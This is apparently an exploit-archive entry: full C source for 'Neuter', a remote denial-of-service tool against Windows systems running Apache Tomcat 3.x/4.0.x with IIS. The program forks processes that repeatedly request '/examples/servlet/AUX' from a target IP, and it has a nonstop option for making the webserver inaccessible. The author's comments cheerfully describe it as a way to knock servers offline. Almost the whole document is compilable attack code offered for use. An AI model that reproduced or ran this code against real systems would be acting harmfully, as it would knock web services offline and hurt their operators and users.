Remote denial of service exploit that can be used against systems running Apache Tomcat (versions prior to 4.1.10) combined with IIS.
043c0addeb744916f1adaf2509fab1aa991eccdb5964f7da4bfc631b11bcf742
/* Windows 2000/NT Apache Tomcat 3.x and 4.0.x DoS
*
* bug discovered by Olaf Schulz on 11 October 2002
* essentially does a GET /examples/servlet/AUX HTTP/1.0 ...2000 times.
*
* This is actually somewhat lame. It seemed to be a rather nice DoS
* if it actually killed the server after XX GET's, but that isn't the case.
* That's why I tossed in the '-x' option to keep hammering the box. When
* this program is running, the webserver becomes inaccessible.
* Not the coolest thing in the world, but it gave me something to do on a boring
* ass monday night. :) -bmbr
*
*
* Compile With:
* Linux: gcc -o neuter neuter.c
* Solaris: gcc -o neuter neuter.c -lsocket -lnsl
*
ZZZZZZZZZZZZZZZZZZZ
Z:::::::::::::::::Z
nnnn nnnnnnnn Z:::::::::::::::::Z ooooooooooo
n:::nn::::::::nn Z:::ZZZZZZZ::::::Z oo:::::::::::oo
eeeeeeeeeee n::::::::::::::nn ZZZZZ * Z::::::Z o:::::::::::::::o
ee:::::::::::eenn:::::::::::::::n 2 Z:::::Z o:::::ooooo:::::o
e:::::::::::::::een:::::nnnn:::::n 0 Z:::::Z o::::o o::::o
e::::::eeeee::::::en::::n n::::n 0 Z:::::Z o::::o o::::o
e:::::e e:::::en::::n n::::n 2 Z:::::Z o::::o o::::o
e::::::eeeee::::::en::::n n::::n * Z:::::Z o::::o o::::o
e::::::::::::::::e n::::n n::::n Z:::::Z o:::::ooooo:::::o
e:::::eeeeeeeeeee n::::n n::::nZZZ:::::Z ZZZZZo:::::::::::::::o
e::::::e n::::n n::::nZ::::::ZZZZZZZZ:::Z oo:::::::::::oo
e:::::::e nnnnnn nnnnnnZ:::::::::::::::::Z ooooooooooo
e:::::::eeeeeeeeee Z:::::::::::::::::Z
ee::::::::::::::e ZZZZZZZZZZZZZZZZZZZ
ee:::::::::::::e \... www.enZotech.net .../
eeeeeeeeeeeeee
(The above is radical ascii art.. Respect it. The below is a lame DoS. )
*/
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <signal.h>
#include <stdlib.h>
#include <limits.h>
#include <math.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
void usage(char* argv0);
void forkoff(char *ip, int port);
int neuter(char *ip, int port);
void sigint();
void sighup();
void sigquit();
int main(int argc, char *argv[])
{
extern int optopt;
extern char *optarg;
int errorflag = 0; /* did someone screw up? */
int port = 80; /* default port to use unless -p */
int c;
int kill = 0;
int killhigh = 2000; /* This is how many GETS to request */
int always = 0;
if ((argc < 2) || (argc > 6))
usage(argv[0]);
while ((c=getopt(argc, argv, "vxp:")) != EOF) {
switch(c) {
case 'p':
fprintf(stderr, "Using port %s\n", optarg);
port = strtol(optarg, NULL, 10);
break;
case 'x':
fprintf(stderr, "Nonstop DoS Attack.. go get a dew..\n");
always = 1;
break;
case 'v':
fprintf(stderr, "Neuter: IIS+Apache Tomcat DoS - [Oct 15, 2002]\n");
fprintf(stderr, "written by: bmbr@enZo\n\n");
exit(0);
case ':':
fprintf(stderr, "Option -%c requires an operand\n", optopt);
errorflag++;
break;
case '?':
fprintf(stderr, "Unrecognized option: -%c\n", optopt);
errorflag++;
}
}
if (errorflag) {
usage(argv[0]);
}
/* kill them */
while (kill <= killhigh) {
forkoff(argv[argc-1], port);
fprintf(stderr, "b00m! ");
if (always != 1)
kill++;
}
fprintf(stderr, "\nFinished!\n");
return 0;
} /* end main */
void usage(char* argv0)
{
fprintf(stderr, "\nNeuter: IIS+Apache Tomcat DoS - [Oct 15, 2002]\n");
fprintf(stderr, "Written by: bmbr@enZo\n\n");
fprintf(stderr, "Usage: %s [-p port] IP\n", argv0);
fprintf(stderr, "optional: -x (don't stop DoS'ing)\n\n");
exit(1);
}
void sigint()
{
signal(SIGINT,sigint);
fprintf(stderr, "CHILD: I have received Sigint!\n");
exit(0);
}
void sigquit()
{
fprintf(stderr, "CHILD: My parent has killed me!\n");
exit(0);
}
void sighup()
{
signal(SIGHUP,sighup);
fprintf(stderr, "CHILD: I have received SIGHUP\n");
}
void forkoff(char *ip, int port)
{
int pid;
pid = fork();
if (pid < 0) {
fprintf(stderr, "Fork Error.\n");
exit(0);
}
else if (pid > 0)
usleep(1000); /* microseconds (millionth of a sec) */
else if (pid == 0) {
signal(SIGHUP,sighup);
signal(SIGINT,sigint);
signal(SIGQUIT,sigquit);
alarm(25);
neuter(ip, port);
alarm(0);
exit(0);
}
}
int neuter(char *ip, int port)
{
int s, r, c;
char *string = "GET /examples/servlet/AUX HTTP/1.0\r\n";
char *stringend = "\r\n\r\n";
struct sockaddr_in addr;
struct hostent *hp;
memset((char *) &addr, '\0', sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(ip);
addr.sin_port= htons(port);
if ((hp = gethostbyname(ip)) != NULL) {
/* need to check the size of h_length to avoid overflow */
if (hp->h_length > sizeof(addr.sin_addr)) {
hp->h_length = sizeof(addr.sin_addr); }
memcpy((char *) &addr.sin_addr, hp->h_addr, hp->h_length);
}
else {
if ((addr.sin_addr.s_addr = inet_addr(ip)) < 0) {
return(0);
}
}
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
r = connect(s, (struct sockaddr *) &addr, sizeof(addr));
write(s, string, strlen(string));
write(s, stringend, strlen(stringend));
c = 0;
close(s);
return 0;
}